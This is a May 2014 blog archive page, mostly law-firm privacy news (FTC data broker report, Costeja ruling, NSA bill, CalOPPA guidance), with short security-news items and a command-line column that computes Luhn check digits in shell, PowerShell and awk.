Monthly Archives: May 2014

FTC Issues Report on Data Broker Industry, Recommends Legislation

On May 27, 2014, the Federal Trade Commission announced the release of a new report entitled Data Brokers: A Call for Transparency and Accountability, detailing the findings of an FTC study of nine data brokers, representing a cross-section of the industry. The Report concludes that the data broker industry needs greater transparency and recommends that Congress consider enacting legislation that would make data brokers’ practices more visible and give consumers more control over the collection and sharing of their personal information.

The Report finds that data brokers collect consumer data from both online and offline sources, storing billions of data elements pertaining to almost every U.S. consumer. In addition, the Report indicates that data brokers share data with each other, and they combine and analyze consumer data to make inferences, including potentially sensitive inferences, about consumers. The Report also notes that, to the extent data brokers currently offer consumers choices about their personal information, consumers may not be aware of those choices.

The FTC recommends that Congress enact legislation to address the lack of visibility into data broker practices, and to provide consumers with increased access and control. In recent years, several bills have been introduced to address these issues, but no federal legislation on the topic has been enacted to date.

The FTC Report takes a different approach from the recent White House data report, “Big Data: Seizing Opportunities, Preserving Values,” which was issued earlier in May. Whereas the White House report discusses both the benefits of data collection as well as its privacy implications, the FTC Report focuses more on potential harms to consumers. The FTC calls for writing into law concepts that have been part of industry voluntary codes of conduct for years.

As we previously reported, in September 2013, Senator Jay Rockefeller (D-WV), Chair of the Senate Committee on Commerce, Science and Transportation, sent letters to twelve popular health and personal finance websites as part of his investigation of the data broker industry. The letters asked the companies to answer questions about their data collection and sharing practices. As reported in Bloomberg BNA, Senator Rockefeller “concluded that the FTC report ‘echoes findings’ of his committee’s recent probe of the data broker industry.”

The FTC voted to approve the issuance of the report 4-0, with Commissioner Terrell McSweeny not participating. Commissioner Julie Brill issued a concurring statement.

Google to Give Effect to Right to Remove Personal Data from Search Results

On May 30, 2014, Google posted a web form that enables individuals to request the removal of URLs from the results of searches that include that individual’s name. The web form acknowledges that this is Google’s “initial effort” to give effect to the recent and controversial decision of the Court of Justice of the European Union in Costeja, widely described as providing a “right to be forgotten.” That Google has moved quickly to offer individuals a formal removal request process will be viewed favorably, but the practicalities of creating a removals process that satisfies all interested parties will remain challenging, and not just for Google.

In Costeja, the Court gave little practical guidance on how the removal request process should operate, beyond requiring search providers to examine whether the right of the individual to request the removal of a URL outweighs the public interest in having access to the information. Google’s web form asks requestors to verify their identity and provide the URL that they wish to see removed from Google’s search results, including details of the search terms used. Requestors must also explain how the search result is “irrelevant, outdated, or otherwise inappropriate.” In evaluating requests, Google is required to consider whether there is a public interest in the contested information remaining in the search results.

The expectations of individuals and data protection authorities (“DPAs”) across Europe as to how this balancing test should apply are likely to differ. From the perspective of individuals, widespread references to a “right to be forgotten” overstate the effect of the Court’s decision in Costeja and may have created unrealistic public expectation as to the practical effect of a successful removal request. Even if a removal request is successful, the URL is only removed from the results of searches that include the requestor’s name. The URL will continue to appear in the results of other searches. To achieve complete removal of the URL from the web, an individual would need to approach the webmaster of the relevant site. It seems inevitable that there will be a raft of complaints from disappointed requestors, and an increased workload for DPAs.

DPAs will be expected to provide guidance to search providers and to help educate individuals as to the scope of the removal right described in Costeja. The Article 29 Working Party, an advisory body comprised of European DPAs, will be meeting in Brussels on June 3-4, 2014, where they will discuss the Costeja decision and identify guidelines for its implementation.

As Deputy Commissioner and Director of Data Protection of the UK Information Commissioner’s Office, David Smith, noted in a blog post this week, “[t]he judgment might mark the end of a lengthy legal process, but it marks the beginning in terms of how a decision in Luxembourg affects the man in the street…”

Disclosure: Google is a client of Hunton & Williams

Hunton’s Global Privacy and Cybersecurity Practice Tops Chambers USA 2014 Rankings

Hunton & Williams LLP is pleased to announce that Chambers and Partners has listed the firm’s Global Privacy and Cybersecurity practice in Band 1 in the 2014 Chambers USA guide. This is the seventh consecutive year the firm was top ranked in this category. In addition, partner and chair of the firm’s Global Privacy and Cybersecurity practice group Lisa Sotto again was recognized as a “Star” performer (the guide’s highest ranking) for privacy and data security.

Chambers USA noted that the firm has “[d]eep experience in the full spectrum of privacy work,” with clients emphasizing that “[t]heir partners are rock stars. They are deep in terms of their knowledge of the regulators and they have the relationships that drive this area of work. Hunton & Williams is top of its game.” The team provides global privacy and cybersecurity advice to leading global companies and other high-profile clients.

In addition, the firm was ranked in the top-tier Band 1 in the Chambers Global guide, including in the guide’s inaugural Europe-wide data protection section, and the Chambers UK and Chambers Europe guides for data protection.

Read the full press release.

Canadian Prime Minister Nominates Next Privacy Commissioner

On May 28, 2014, Canadian Prime Minister Stephen Harper nominated Daniel Therrien as the next Privacy Commissioner of Canada. If approved, Therrien would take over from the interim Privacy Commissioner Chantal Bernier, who has been serving in this role after the previous Commissioner Jennifer Stoddart’s term ended in December 2013.

Therrien is currently Assistant Deputy Attorney General of the Public Safety, Defence and Immigration Portfolio at the Department of Justice. His nomination must be approved by the Senate and House of Commons of Canada.

The Canadian Privacy Commissioner is responsible for compliance with both the Privacy Act and the Personal Information Protection and Electronic Documents Act (“PIPEDA”).

We’re moving and expanding!

This blog is moving (and expanding) to a full IT security news and views site ( Latest news on ITsecurity But that’s all folks. If you want to keep up with the latest news and views, hop over to ITsecurity! Two iPhone hackers probably behind the Oleg Pliss attacks arrested in Russia CESG advice on […]

Hunton Global Privacy Update – May 2014

On May 14, 2014, Hunton & Williams’ Global Privacy and Cybersecurity practice group hosted the latest webcast in its Hunton Global Privacy Update series. The program provided a global overview of some of the most debated topics in data protection and privacy, including cross-border data flows, global data breach issues and the EU Cybersecurity Directive. In addition, we highlighted the latest information regarding the GPEN enforcement sweep.

Listen to a recording of the May 2014 Hunton Global Privacy Update.

Previous recordings of the Hunton Global Privacy Updates may be accessed under the Multimedia Resources section of our privacy blog.

Hunton Global Privacy Update sessions are 30 minutes in length and are scheduled to take place every two months. The next Privacy Update is slated for July 15, 2014.

House Passes Bill Limiting NSA Data Collection

On May 22, 2014, the United States House of Representatives passed H.R. 3361, a bill aimed at limiting the federal government’s ability to collect bulk phone records and increasing transparency regarding decisions by the Foreign Intelligence Surveillance Court (“FISC”). The bill was approved by a vote of 323-121 by majorities of both Democrat and Republican members of the United States House of Representatives. It now moves to the Senate where it is likely to pass.

The bill is designed to prohibit the bulk collection of telephone records by the National Security Agency, but if it becomes law, the federal government still would have access to individuals’ phone records. Such access would require the government to use a “specific selection term” to narrow its collection to phone records that are relevant to a particular investigation.

In addition, the bill would revise the procedures governing the FISC. The bill would require the FISC to appoint an individual with “privacy or civil liberties, intelligence collection, telecommunications” expertise to serve as amicus curiae, to assist the court with novel or significant interpretations of law. The bill also would require the government to determine whether it should declassify prior FISC opinions.

Finally, the bill also extends certain provisions of the USA PATRIOT Act that are scheduled to expire in 2015.

Read H.R. 3361.

FTC Seeks Privacy Protection for Personal Information in Bankruptcy Proceeding

On May 23, 2014, the Federal Trade Commission announced that the FTC’s Bureau of Consumer Protection sent a letter to the court overseeing the bankruptcy proceedings for ConnectEDU Inc. (“ConnectEDU”), an education technology company, warning that the proposed sale of the company’s assets raises privacy concerns. ConnectEDU’s assets include personal information collected from students, high schools and community colleges in connection with the company’s website and affiliated services.

On its website, the company’s privacy policy states that “In the event of sale or intended sale of the Company, ConnectEDU will give users reasonable notice and an opportunity to remove personally identifiable data from the service.” In her letter to the court, Jessica Rich, Director of the Bureau of Consumer Protection, wrote, “We believe that any sale of the personal information of ConnectEDU’s customers would be inconsistent with ConnectEDU’s privacy policy, unless ConnectEDU provides those customers with notice and an opportunity to delete the information.” The FTC’s Bureau of Consumer Protection believes that a sale without reasonable notice to users and an opportunity to remove personal information would violate “the FTC’s prohibition against ‘deceptive acts or practices in or affecting commerce.’”

The letter states that these privacy concerns “would be greatly diminished” if ConnectEDU gives users “notice of the sale of their personal information and opportunity for its removal” or destroys the personal information. The court also could appoint a “privacy ombudsman to ensure that the privacy interests of ConnectEDU’s customers are protected.”

The FTC voted to approve the issuance of the letter 5-0.

Read the related post on the FTC’s Business Center Blog.

Virginia Governor McAuliffe Appoints Paul Tiao to Virginia Cyber Security Commission

On May 16, 2014, Virginia Governor Terry McAuliffe announced the members of the Virginia Cyber Security Commission, including the appointment of Hunton & Williams LLP’s Paul M. Tiao. Tiao, one of eleven citizen members elected to the group, is a partner in the firm’s Global Privacy and Cybersecurity Practice Group.

“The cybersecurity issues facing both the Commonwealth and the nation are substantial,” said Tiao. “I’m honored to be selected to serve on the governor’s Commission. I look forward to having this opportunity to help the State and to work with the leaders on the Commission.”

The Commission, established by executive order on February 26, 2014, brings together public and private sector industry leaders from around the state, as well as McAuliffe Administration representatives, to offer recommendations on how to make Virginia a national leader in cybersecurity. Co-chaired by Secretary of Technology Karen Jackson and Chairman and CEO of Good Harbor Security Risk Management Richard Clarke, the group is slated to hold its inaugural meeting June 11.

Read the full press release.

More on the Avast breach and the hash used

My understanding is that the hash formula used by Avast to store its forum users’ passwords was $hash = sha1(strtolower($username) . $password); This is the formula built into the SMF open source forum software used by Avast. It is both good and bad. It confirms that the hash was salted (with the user’s username); but […]

Avast forum hack demonstrates we need password storage disclosure

A blog post early this morning by Avast Software CEO Vince Steckler announced The AVAST forum is currently offline and will remain so for a brief period. It was hacked over this past weekend and user nicknames, user names, email addresses and hashed (one-way encrypted) passwords were compromised. AVAST forum offline due to attack Avast’s […]

Hector ‘Sabu’ Monsegur to be sentenced while Hammond sits in prison

A common cry in Anonymous circles is ‘Free Jeremy Hammond; Fuck Sabu’. Jeremy Hammond is currently serving a ten-year prison sentence for his involvement in the Stratfor hack. Sabu (real name Hector Xavier Monsegur) will be sentenced tomorrow for his role in Lulzsec and many other hacks. He is expected, on FBI request, to walk […]

Catching up on recent crypto developments

When I started this blog, the goal was to write long-form posts that could serve as a standalone intro to security and crypto topics. Rather than write about the history of the NSA as planned, I’ll try writing a few short notes in hopes that they’ll fit better within the time I have. (Running a company and then launching a new one the past few years has limited my time.)

Heartbleed has to be the most useful SSL bug ever. It has launched not just one, but two separate rewrites of OpenSSL. I’m hoping it will also give the IETF more incentive to reject layering violations like the heartbeat extension. Security protocols are for security, not path MTU discovery.

Giving an attacker a way to ask you to say a specific phrase is never a good idea. Worse would be letting them tell you what to say under encryption.

Earlier this year, I was pleased to find out that a protocol I designed and implemented has been in use for millions (billions?) of transactions the past few years. During design, I spent days slaving over field order and dependencies in order to force implementations to be as simple as possible. “Never supply the same information twice in a protocol” was the mantra, eliminating many length fields and relying on a version bump at the start of the messages if the format ever changed. Because I had to create a variant cipher mode, I spent 5x the initial design time scrutinizing the protocol for flaws, then paid a third-party for a review.

As part of the implementation, I provided a full test harness and values covering all the valid and error paths. I also wrote a fuzzer and ran that for days over the final code to check for any possible variation in behavior, seeding it with the test cases. I encouraged the customer to integrate these tests into their release process to ensure changes to the surrounding code (e.g., 32/64 bit arch) didn’t break it. Finally, I helped with the key generation and production line design to be sure personalization would be secure too.

I firmly believe this kind of effort is required for creating security and crypto that is in widespread use. This shouldn’t be extraordinary, but it sadly seems to be so today. It was only through the commitment of my customer that we were able to spend so much effort on this project.

If you have the responsibility to create something protecting money or lives, I hope you’ll commit to doing the same.

Episode #178: Luhn-acy

Hal limbers up in the dojo

To maintain our fighting trim here in the Command Line Kung Fu dojo, we like to set little challenges for ourselves from time to time. Of course, we prefer it when our loyal readers send us ideas, so keep those emails coming! Really... please oh please oh please keep those emails coming... please, please, please... ahem, but I digress.

All of the data breaches in the news over the last year got me thinking about credit card numbers. As many of you are probably aware, credit card numbers have a check digit at the end to help validate the account number. The Luhn algorithm for computing this digit is moderately complicated and I wondered how much shell code it would take to compute these digits.

The Luhn algorithm is a right-to-left calculation, so it seemed like my first task was to peel off the last digit and be able to iterate across the remaining digits in reverse order:

$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do echo $d; done

The "rev" utility flips the order of our digits, and then we just grab everything from the second digit onwards with "cut". We use a little "sed" action to break the digits up into a list we can iterate over.

Then I started thinking about how to do the "doubling" calculation on every other digit. I could have set up a shell function to calculate the doubling each time, but with only 10 possible outcomes, it seemed easier to just create an array with the appropriate values:

$ doubles=(0 2 4 6 8 1 3 5 7 9)
$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do echo $d ${doubles[$d]}; done
8 7
7 5
6 3
5 1
4 8
3 6
2 4
1 2

Then I needed to output the "doubled" digit only every other digit, starting with the first from the right. That means a little modular arithmetic:

$ c=0
$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do
echo $(( ++c % 2 ? ${doubles[$d]} : $d ));


I've introduced a counting variable, "$c". Inside the loop, I'm evaluating a conditional expression to decide if I need to output the "double" of the digit or just the digit itself. There are several ways I could have handled this conditional operation in the shell, but having it in the mathematical "$((...))" construct is particularly useful when I want to calculate the total:

$ c=0; t=0; 
$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do
t=$(( $t + (++c % 2 ? ${doubles[$d]} : $d) ));

$ echo $t

We're basically done at this point. Instead of outputting the total, "$t", I need to do one more calculation to produce the Luhn digit:

$ c=0; t=0; 
$ for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do
t=$(( $t + (++c % 2 ? ${doubles[$d]} : $d) ));

$ echo $(( ($t * 9) % 10 ))

Here's the whole thing in one line of shell code, including the array definition:

doubles=(0 2 4 6 8 1 3 5 7 9); 
c=0; t=0;
for d in $(echo 123456789 | rev | cut -c2- | sed 's/\(.\)/\1 /g'); do
t=$(( $t + (++c % 2 ? ${doubles[$d]} : $d) ));
echo $(( ($t * 9) % 10 ))

Even with all the extra whitespace, the whole thing fits in under 100 characters! Grand Master Ed would be proud.

I'm not even going to ask Tim to try and do this in CMD.EXE. Grand Master Ed could have handled it, but we'll let Tim use his PowerShell training wheels. I'm just wondering if he can do it so it still fits inside a Tweet...

Tim checks Hal's math

I'm not quite sure how Hal counts, but I when I copy/paste and then use Hal's own wc command I get 195 characters. It is less than *2*00 characters, not long enough to tweet.

Here is how we can accomplish the same task in PowerShell. I'm going to use a slightly different method than Hal. First, I'm going to use his lookup method as it is more terse then doing the extra match via if/then. In addition, I am going to extend his method a little to save a little space.

PS C:\> $lookup = @((0..9),(0,2,4,6,8,1,3,5,7,9));

This mutli-dimensional array contains a lookup for the number as well as the doubled number. That way I can index the value without an if statement to save space. Here is an example:

PS C:\> $isdoubled = $false
PS C:\> $lookup[$isdoubled][6]
PS C:\> $isdoubled = $true
PS C:\> $lookup[$isdoubled][7]

The shortest way to get each digit, from right to left, is by using regex (regular expression) match and working right to left. A longer way would be to use the string, convert it to a char array, then reverse it but that is long, ugly, and we need to use an additional variable.

The results are fed into a ForEach-Object loop. Before the objects (the digits) passed down the pipeline are handled we need to initialize a few variables, the total and the boolean $isdoubled variables in -Begin. Next, we add the digits up by accessing the items in our array as well as toggling the $isdoubled variable. Finally, we use the ForEach-Object's -End to output the final value of $sum.

PS C:\> ([regex]::Matches('123456789','.','RightToLeft')) | ForEach-Object 
-Begin { $sum = 0; $isdoubled = $false} -Process { $sum += $l[$isdoubled][[int]$_.value]; $d = -not $d }
-End { $sum }

We can shorten the command to this to save space.

PS C:\> $l=@((0..9),(0,2,4,6,8,1,3,5,7,9));
([regex]::Matches('123456789','.','RightToLeft')) | %{ $s+=$l[$d][$_.value];$d=!$d} -b{$s=0;$d=0} -en{$s}

According to my math this is exactly 140 characters. I could trim another 2 by removing a few spaces too. It's tweetable!

I'll even throw in a bonus version for cmd.exe:

C:\> powershell -command "$l=@((0..9),(0,2,4,6,8,1,3,5,7,9));
([regex]::Matches("123456789",'.','RightToLeft')) | %{ $s+=$l[$d][$_.value];$d=!$d} -b{$s=0;$d=0} -en{$s}"

Ok, it is a bit of cheating, but it does run from CMD.

Hal gets a little help

I'm honestly not sure where my brain was at when I was counting characters in my solution. Shortening variable names and removing all extraneous whitespace, I can get my solution down to about 150 characters, but no smaller.

Happily, Tom Bonds wrote in with this cute little blob of awk which accomplishes the mission:

awk 'BEGIN{split("0246813579",d,""); for (i=split("12345678",a,"");i>0;i--) {t += ++x % 2 ? d[a[i]+1] : a[i];} print (t * 9) % 10}'

Here it is with a little more whitespace:

awk 'BEGIN{ split("0246813579",d,"");
for (i=split("12345678",a,"");i>0;i--) {
t += ++x % 2 ? d[a[i]+1] : a[i];
print (t * 9) % 10

Tom's getting a lot of leverage out of the "split()" operator and using his "for" loop to count backwards down the string. awk is automatically initializing his $t and $x variables to zero each time his program runs, whereas in the shell I have to explicitly set them to zero or the values from the last run will be used.

Anyway, Tom's original version definitely fits in a tweet! Good show, Tom!

California Attorney General Releases Guidance on Recent Changes to CalOPPA

On May 21, 2014, California Attorney General Kamala D. Harris issued guidance for businesses (“Guidance”) on how to comply with recent updates to the California Online Privacy Protection Act (“CalOPPA”). The recent updates to CalOPPA include requirements that online privacy notices disclose how a site responds to “Do Not Track” signals, and whether third parties may collect personal information about consumers who use the site. In an accompanying press release, the Attorney General stated that the Guidance is intended to provide a “tool for businesses to create clear and transparent privacy policies that reflect the state’s privacy laws and allow consumers to make informed decisions.” The Guidance is not legally binding; it is intended to encourage companies to draft transparent online privacy notices.

The Guidance, Making Your Privacy Practices Public, recommends, among other items, that website operators’ online privacy notices should:

  • conspicuously identify the section of the notice that provides information on the site’s response to “Do Not Track” signals;
  • state whether third parties are collecting personally identifiable information;
  • explain uses of personally identifiable information beyond the uses necessary for fulfilling the basic functionality of the online service;
  • provide links to the privacy policies of third parties with whom the website operator shares personally identifiable information; and
  • describe the choices a consumer has with respect to the collection, use and distribution of his or her personal information.

The guidance clarifies that describing how a website responds to a “Do Not Track” signal is preferable to merely linking to a “choice program” because a description of the site’s specific response provides greater transparency to consumers. In crafting this section of an online privacy notice, website operators should consider whether they (1) treat a visitor differently if his or her browser relays a “Do Not Track” signal, and (2) collect visitors’ personally identifiable information over time and across third party websites. If website operators provide a link to a “choice program” rather than describing their sites’ particular response to a “Do Not Track” signal, the operators should ensure that (1) they comply with the “choice program,” and (2) the link to the “choice program” describes the program’s effects on the consumer and how the consumer can exercise his or her choice offered by the program.

Read the full version of the guidance.

FCC Reaches Settlement Over Alleged Do-Not Call Registry Violations

On May 19, 2014, the Federal Communications Commission announced that Sprint Corporation agreed to pay $7.5 million to settle an FCC Enforcement Bureau investigation stemming from allegations that the company failed to honor consumers’ requests to opt out of telemarketing calls and texts. Sprint also agreed to implement a two-year plan to help ensure future compliance with Do-Not-Call registry rules.

The terms of the FCC’s Consent Decree require the company to:

  • develop a compliance plan designed to help ensure future compliance with the FCC’s rules requiring companies to maintain internal Do-Not-Call lists and honor consumers’ requests;
  • designate a Compliance Officer; and
  • implement a training program for employees and contractors on recording Do-Not-Call requests so that the company removes those customers’ names and numbers from marketing lists.

The National Do-Not-Call Registry was established in 2003. Consumers may register their phone numbers to opt out of receiving most telemarketing calls.

EU Court of Justice Upholds Right to Erasure in Google Search Case

On May 13, 2014, the European Court of Justice (the “ECJ”) rendered its judgment in Google Spain S.L. and Google Inc. v Agencia Española de Protección de Datos (Case C-131/12, “Google v. AEPD” or the “case”). The case concerns a request made by a Spanish individual, Mr. Costeja, to the Spanish Data Protection Authority (Agencia Española de Protección de Datos or “AEPD”) to order the removal of certain links from Google’s search results. The links relate to an announcement in an online newspaper of a real estate auction for the recovery of Mr. Costeja’s social security debts. The information was lawfully published in 1998, but Mr. Costeja argued that the information had become irrelevant as the proceedings concerning him had been fully resolved for a number of years. The AEPD upheld the complaint and ordered Google Spain S.L. and Google Inc. (“Google”) to remove the links from their search results. Google appealed this decision before the Spanish High Court, which referred a series of questions to the ECJ for a preliminary ruling. The ECJ ruled as follows:

  • The actions of search engine operators, in automatically collecting information from the Internet, storing and indexing that information, and displaying that information in search results, constitutes “processing” of personal data, within the meaning of the EU Data Protection Directive 95/46/EC (the “Directive”). The search engine operator is a “data controller,” within the meaning of the Directive, with respect to such processing.
  • Where (1) a search engine operator located outside the EU has subsidiaries in one or more EU Member States, (2) those subsidiaries promote and sell advertising space offered by that search engine, and (3) the search engine directs its activities towards the inhabitants of those Member States (e.g., by providing a website with a local top-level domain and local language customizations), then that search engine operator is treated as being  “established” in those EU  Member States (within the meaning of Article 4(1)(a) of the Directive).
  • The ECJ therefore considers that, although Google Inc. is a company registered in California, it is a data controller with  espect to its search services and is “established” in Spain “in the context of the activities” of Google Spain, because Google Spain promotes and sells advertising  services that are integrated into Google Search results, and such advertising is served on Google’s Spanish website (
  • At the request of any individual, a search engine operator is required to consider, on a case-by-case basis, whether information that relates to that individual personally should no longer be displayed in the results of a search made on the basis of the individual’s name, particularly if the information is inadequate, irrelevant or excessive, in relation to the purposes for which the information is processed. This consideration should take into account all of the circumstances of the case, including the individual’s rights under  Articles 7 (respect for private and family life) and 8 (protection of personal data) of the Charter of Fundamental Rights of the European Union.
  • If, given the circumstances, the information is inadequate, irrelevant or excessive, then the search engine operator is obligated to remove, from the list of results displayed following a search made on the basis of that individual’s name, links to third party web pages containing that information (even when the original publication of the information on those third party web pages is lawful), unless there are particular reasons (such as the individual’s role in public life) that justify an overriding interest of the general public in having access to that information.

Singapore Personal Data Protection Commission Publishes Two Advisory Guidelines and Anticipates Promulgation of PDPA Regulations

On May 16, 2014, the Singapore Personal Data Protection Commission (the “Commission”) published advisory guidelines for the implementation of its Personal Data Protection Act (the “PDPA”) for two industry sectors. The guidelines were published on the same day on which the Commission held its well-attended Personal Data Protection Seminar focusing on international perspectives on data governance. The advisory guidelines generally have the following content:

  • The Advisory Guidelines for the Telecommunications Sector were developed in consultation with the Info-communications Development Authority of Singapore. They address issues and circumstances that may apply to enterprises in the telecommunications sector when they seek to comply with the PDPA. The guidelines discuss, for example, whether telephone numbers constitute personal data and in what circumstances an Internet protocol address or international mobile equipment identity number may constitute personal data.
  • The Advisory Guidelines for the Real Estate Agency Sector were developed in consultation with the Council for Estate Agencies. They address circumstances that real estate agencies may face in complying with the PDPA. The guidelines discuss the use of anonymized and aggregated personal data and business contact information.

The publication of these two advisory guidelines illustrates the overall structure under which Singapore will implement its PDPA. In general, the PDPA functions as the baseline framework data protection law, with regulations, guidelines and rules applicable to particular industry sectors or topics published and applied on a sector-by-sector (or topic-by-topic) basis. The publication of these guidelines also illustrates the seriousness and focus with which Singapore and its Commission are preparing for the effectiveness and implementation of the PDPA.

More advisory guidelines can be expected in the near future for the educational, health care and social service sectors, as well as for the specific topic of photography. Perhaps most significantly at this time, on May 16, 2014, the Commission also published a note announcing the closing of its public consultation for the PDPA regulations. Based on this note, it appears that when those regulations are formally promulgated, they will include significant provisions on how entities may properly effect a cross-border data transfer from Singapore, as well as provisions expounding on access and correction rights. The cross-border transfer restrictions likely will require the transferor to take appropriate steps (which may not necessarily be contractual) to ensure that the data will receive the same level of protection in their destination country as would have applied in Singapore. The restrictions, however, would allow transfers made with the consent of the data subject, or transfers made for the purpose of performing a contract made with the data subject, to proceed more readily.

The promulgation of the PDPA regulations may be the next significant step in the implementation of the PDPA. We will promptly report on that development when it occurs.

The personal data protection provisions of the PDPA come into effect on July 2, 2014.

Read our previous coverage on the Commission’s efforts regarding the PDPA.

French Data Protection Authority Unveils 2013 Annual Activity Report

On May 19, 2014, the French Data Protection Authority (the “CNIL”) published its Annual Activity Report for 2013 (the “Report”) highlighting its main accomplishments in 2013 and outlining some of its priorities for the upcoming year.

The Report discusses the proposed EU General Data Protection Regulation, and reiterates the CNIL’s main concerns with the proposal, namely:

  • The one-stop-shop mechanism: according to the CNIL, it needs to provide better protection for individuals and allow for oversight by the data protection authority of the EU Member State where the individuals reside;
  • Pseudonymous data: in the CNIL’s view, pseudonymous data should not benefit from a specific derogatory regime; and
  • The risk-based approach: the approach should not exempt the data controller of its general obligation to comply with the Regulation.

The Report further discusses the French government’s proposed new Digital Act, which was announced in February 2013. The Report includes several recommendations for French lawmakers to consider, such as allowing individuals to request access to their personal data electronically, and increasing the CNIL’s maximum fines.

The following are some of other highlights from the Report:

  • In 2013, the CNIL received 5,640 complaints (a number which is slightly down from 2012). 34% of these complaints concerned the Internet/telecoms sector and related to issues such as erasing texts, photographs, videos, contact details and comments on the Internet; 19% of the complaints focused on issues like the right to object to receiving marketing emails, the retention of banking data, etc.
  • In 2013, the CNIL conducted 414 inspections. More than 130 of these inspections were related to video surveillance systems (CCTV systems). In most cases, the CCTV systems were composed of several CCTV cameras, some of which captured images of public areas (and thus are regulated by the French Code of Internal Security), while other CCTV cameras captured sites not open to the public (and thus are subject to the French Data Protection Act). According to the Report, the main infringements were related to (1) failure to notify the CNIL of the CCTV system or obtain authorization from the appropriate authorities; (2) a lack of information or insufficient information to individuals; (3) retaining personal data for longer period than authorized by the prefect or recommended by the CNIL; and (4) failure to implement adequate security measures.
  • Since 2011, the CNIL has received 31 data security breach notifications (15 in 2013 and 2 in 2014). The CNIL already served 10 formal notices and adopted 8 sanctions related to these breaches. The Report reiterates that the CNIL’s inspections in 2014 will focus on how telecommunications service providers manage data security breaches.

Read the CNIL’s full report.

Sotto Speaks on the Importance of Cross-Border Data Transfers to Global Prosperity

Hunton & Williams LLP, in coordination with the U.S. Chamber of Commerce, recently issued a report entitled Business Without Borders: The Importance of Cross-Border Data Transfers to Global Prosperity, highlighting the benefits of cross-border data transfers to businesses in the international marketplace. The report underscores the importance of developing data transfer mechanisms that protect privacy and facilitate the free-flow of data, and also explores opportunities for new data transfer regimes.

Day 2 (69)

On May 20 and 21, 2014, lead Hunton & Williams author Lisa J. Sotto, head of the Global Privacy and Cybersecurity practice, is introducing the report at a two-day workshop in Jakarta, Indonesia, “A Digital Trade and Cross-Border Data Flows Conference: Unleashing Indonesia’s Digital Economy and Innovation Sector.” The workshop, which is being hosted by AmCham Indonesia and the U.S. Chamber of Commerce, in coordination with local Indonesian associations, focuses on digital trade and provide a platform for companies to discuss the policies necessary to ensure success in the Information Age. Sotto is addressing the degree to which today’s businesses rely on cross-border data flows and digital commerce.

Bridget Treacy, head of the UK Privacy and Cybersecurity practice at Hunton & Williams, coauthored the paper which recommends movement away from rigid, one-size-fits-all cross-border data transfer rules toward more outcome-focused frameworks. The report advocates implementing strong, binding trade agreement commitments that prohibit data localization requirements, support unimpeded data flows, and encourage interoperability among privacy regimes.

Read the full press release.

FBI indicts five members of the Chinese military for hacking US companies

Eric Holder yesterday announced: “Today, we are announcing an indictment against five officers of the Chinese People’s Liberation Army for serious cybersecurity breaches against six American victim entities.” The five officers are known by the aliases UglyGorilla, Jack Sun, Lao Wen, hzy_1hx and KandyGoo. They are members of the PLA’s military unit 61398 (you may […]

Worldwide crackdown on BlackShades RAT users

First official indications emerged at the Reuters Cybersecurity Summit (although there have been rumblings in hacker circles for a couple of weeks now). This was last Wednesday. The FBI executive assistant director Robert Anderson, appointed in March to oversee ‘all FBI criminal and cyber investigations worldwide, international operations, critical incident response, and victim assistance’, announced: […]

FTC Approves Consent Orders with Companies that Marketed Genetically Customized Nutritional Supplements

On May 12, 2014, the Federal Trade Commission announced that it has approved final consent orders with two companies that marketed genetically customized nutrition supplements. In addition to charges that the companies’ claims regarding the effectiveness of their products were not sufficiently substantiated, the settlements also allege that the companies misrepresented their privacy and security practices. The two companies, Gene Link, Inc. (“Gene Link”) and foru™ International Corp. (“foru” – a former subsidiary of Gene Link), represented in their privacy policy that they had “taken every precaution to create a process that allows individuals to maintain the highest level of privacy” and that the companies’ third party service providers are “contractually obligated to maintain the confidentiality and security of the Personal Customer Information and are restricted from using such information in any way not expressly authorized” by the companies.

According to the FTC’s complaints against Gene Link and foru, the companies failed to provide appropriate security measures to protect consumers’ personal information by:

  • Not requiring service providers by contract to implement reasonable safeguards and not engaging in reasonable oversight of those service providers;
  • Maintaining consumers’ personal information, including Social Security numbers and bank account numbers, in clear text;
  • Enabling service providers to access consumers’ complete personal information, even if such information was not necessary for service providers to perform their duties; and
  • Neglecting to limit wireless access to their network.

The consent orders with Gene Link and foru prohibit the companies from misrepresenting the extent to which the companies maintain the privacy, security and confidentiality of consumers’ personal information. The consent orders also obligate the companies to implement comprehensive information security programs that are subject to independent assessment on a biennial basis for the next 20 years.

EEOC Suffers Another Loss in Its Crusade Against Employer Background Checks

As reported in the Hunton Employment & Labor Perspectives Blog:

On April 9, 2014, the Sixth Circuit of Appeals not only affirmed summary judgment in EEOC v. Kaplan Higher Education Corp., et al. but also chastised the Equal Employment Opportunity Commission (“EEOC”) for applying a flawed methodology in its attempts to prove that using credit checks as a pre-employment screen had an unlawful disparate impact against African-American applicants.

The Sixth Circuit began its opinion by noting that the EEOC sued defendants for using the same type of background check the EEOC itself uses. The Court further acknowledged that Kaplan has legitimate business justifications for running credit checks on applicants for senior-executive positions, accounting and other positions with access to company financials or cash, and positions with access to student financial-aid information because of its past history when it discovered that some of its financial-aid officers had stolen payments that belonged to students and some of its executives had engaged in self-dealing, by hiring relatives as vendors.

But, the focal point of the Sixth Circuit opinion centers around the reliability, or lack of thereof, of the “race rating” process crafted by the EEOC’s expert, Kevin Murphy. Because Kaplan’s credit-check policy is racially blind, the EEOC subpoenaed records from various states’ departments of motor vehicles. In response to these subpoenas, eleven states provided records that identified an applicant’s race, but thirty-six states and the District of Columbia provided color copies of drivers’ license photos for approximately 900 applicants. To address these photos, Murphy devised the “race rating” process, whereby a team of five “race raters” reviewed the drivers’ license photos to classify what race the applicants should be placed in for purposes of Murphy’s statistical assessment of Kaplan’s credit check policy. The “race rating” process had numerous flaws, not to mention that the raters had no particular expertise in race rating, they failed to reach consensus 11.7% of the time, Murphy provided the raters with the applicants’ names, and notably, the process yielded statistical “fail” rates that were higher than the actual “fail” rates of Kaplan’s credit check policy. Quoting directly from the Court:

The EEOC brought this case on the basis of a homemade methodology, crafted by a witness with no particular expertise to craft it, administered by persons with no particular expertise to administer it, tested by no one, and accepted only by the witness itself.

The Court found that the district court did not abuse its discretion in excluding Murphy’s testimony.

What this case signifies for employers is that there are viable challenges an employer can make to attack the EEOC’s disparate impact theory, including the expertise of as well as the methodology and results espoused by the EEOC’s expert.

